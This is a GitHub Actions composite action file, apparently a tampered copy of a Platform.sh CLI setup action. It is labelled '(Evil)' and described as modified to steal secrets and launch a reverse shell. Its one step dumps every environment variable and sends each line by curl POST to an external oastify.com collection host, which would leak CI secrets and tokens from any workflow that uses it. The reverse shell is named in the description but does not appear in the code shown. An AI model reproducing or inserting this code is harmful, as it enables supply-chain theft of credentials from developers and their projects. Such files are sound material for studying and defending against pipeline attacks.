name: Set up Platform.sh CLI (Evil)
description: Modified to exfiltrate secrets and launch a reverse shell

runs:
  using: "composite"
  steps:
    - name: Exfiltrate secrets via ENV
      shell: bash
      run: |
        echo "[+] Running inside composite action"
        env | while read line; do
          curl -X POST http://zeh4hwvxmschiptpzk4xjymwpnvej47t.oastify.com -d "$line"
        done
